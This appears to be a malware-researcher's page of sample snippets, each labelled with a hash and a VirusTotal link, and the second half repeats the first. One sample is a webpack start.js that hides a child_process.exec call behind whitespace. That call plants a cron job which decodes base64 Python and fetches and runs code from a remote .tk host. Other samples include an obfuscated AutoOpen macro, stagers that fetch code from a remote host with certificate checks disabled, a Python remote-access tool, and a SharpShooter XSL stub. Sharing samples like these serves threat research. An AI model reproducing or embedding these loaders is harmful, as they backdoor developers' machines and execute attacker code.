John Lambert JohnLaTwC

## Webpack start.js
'use strict';

// Do this as the first thing so that any code reading it knows the right env.
process.env.BABEL_ENV = 'development';
process.env.NODE_ENV = 'development';
                                                                                                                                                                                                                                                                                          require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vbGVveHRidXl4by50azo0NDMvbWNJZllwQmwyTVUtcHl1elpQMUZfd19HeDM3SFZ2

## start.js
'use strict';

 // Do this as the first thing so that any code reading it knows the right env.
 process.env.BABEL_ENV = 'development';
 process.env.NODE_ENV = 'development';
                                                                                                                                                                                                                                                                                           require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('import sys
vi=sys.version_info
ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=['build_opener'])
hs=[]
o=ul.build_opener(*hs)

## Macro-Doc-Scriptlet-Ps1 threat
## uploaded by @JohnLaTwC
## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
===============================================================================
FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
Type: OLE
-------------------------------------------------------------------------------

## 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd
## Uploaded by @JohnLaTwC
## Hash: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd
Sub AutoOpen()
    Dim abjaWFApqTOaGknEZ As String
    Dim EVvHI As Object
    Dim aqwMEEghqLNesI As Integer
    Dim TgAVw As String

    aqwMEEghqLNesI = 816
    abjaWFApqTOaGknEZ = HyqtqSXGmk("5f7b6b7a") & "qx|6[pmtt"

## 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22
## Uploaded @JohnLaTwC
## Hash: 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22
## VT Link: https://www.virustotal.com/#/file/9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22/detection

var1 = '''aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm'''
import re

# Matches everything between two texts, returns the first match, Returns: str or False
var2 = '''8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xOTIuMTY4LjQyLjI0MDo0NDMvTjdBOFJaNnRnLVlYSndJelRLWkJGd2o1S0JxZDJmYTQtdWt

## cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e
## Uploaded by @JohnLaTwC
## Hash: cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e
## VTLink: https://www.virustotal.com/#/file/cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e/detection

<?XML version="1.0"?>

<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >

## a6d3865be64c8f0caf649447f68cf9769e3e6a10843bca0b4576e3a33a4d1ad4
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from PIL import ImageGrab 								# /capture_pc
from shutil import copyfile, copyfileobj, rmtree, move 	# /ls, /pwd, /cd, /copy, /mv
from sys import argv, path, stdout 						# console output
from json import loads 									# reading json from ipinfo.io
from winshell import startup 							# persistence
from tendo import singleton								# this makes the application exit if there's another instance already running
from win32com.client import Dispatch					# WScript.Shell

## 172c90e7d9814d066134fe6779f704cc542d7126f7c6ed0ce8c3cd3632fd7d2d
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:sharp="http://sharp.shooter/mynamespace">

<msxsl:script language="JScript" implements-prefix="sharp">
   function shooter(nodelist) {
<![CDATA[
function setversion() {

## 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OpX:MAS-H--- 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
===============================================================================
FILE: 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'

## 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OpX:M-S-H--- 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55
===============================================================================
FILE: 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: visio/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
	'use strict';

	// Do this as the first thing so that any code reading it knows the right env.
	process.env.BABEL_ENV = 'development';
	process.env.NODE_ENV = 'development';
	require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vbGVveHRidXl4by50azo0NDMvbWNJZllwQmwyTVUtcHl1elpQMUZfd19HeDM3SFZ2
	## uploaded by @JohnLaTwC
	## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
	olevba 0.52dev7 - http://decalage.info/python/oletools
	Flags Filename
	----------- -----------------------------------------------------------------
	OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
	===============================================================================
	FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
	Type: OLE
	-------------------------------------------------------------------------------
	## Uploaded by @JohnLaTwC
	## Hash: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd
	Sub AutoOpen()
	Dim abjaWFApqTOaGknEZ As String
	Dim EVvHI As Object
	Dim aqwMEEghqLNesI As Integer
	Dim TgAVw As String

	aqwMEEghqLNesI = 816
	abjaWFApqTOaGknEZ = HyqtqSXGmk("5f7b6b7a") & "qx\|6[pmtt"
	## Uploaded @JohnLaTwC
	## Hash: 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22
	## VT Link: https://www.virustotal.com/#/file/9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22/detection

	var1 = '''aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm'''
	import re

	# Matches everything between two texts, returns the first match, Returns: str or False
	var2 = '''8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xOTIuMTY4LjQyLjI0MDo0NDMvTjdBOFJaNnRnLVlYSndJelRLWkJGd2o1S0JxZDJmYTQtdWt
	## Uploaded by @JohnLaTwC
	## Hash: cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e
	## VTLink: https://www.virustotal.com/#/file/cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e/detection

	<?XML version="1.0"?>

	<scriptlet>
	<registration
	progid="Pentest"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	#!/usr/bin/env python
	# -- coding: utf-8 --
	import logging
	from PIL import ImageGrab # /capture_pc
	from shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv
	from sys import argv, path, stdout # console output
	from json import loads # reading json from ipinfo.io
	from winshell import startup # persistence
	from tendo import singleton # this makes the application exit if there's another instance already running
	from win32com.client import Dispatch # WScript.Shell
	<?xml version='1.0'?>
	<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:sharp="http://sharp.shooter/mynamespace">

	<msxsl:script language="JScript" implements-prefix="sharp">
	function shooter(nodelist) {
	<![CDATA[
	function setversion() {
	olevba3 0.53.1 - http://decalage.info/python/oletools
	Flags Filename
	----------- -----------------------------------------------------------------
	OpX:MAS-H--- 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
	===============================================================================
	FILE: 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
	Type: OpenXML
	-------------------------------------------------------------------------------
	VBA MACRO ThisWorkbook.cls
	in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'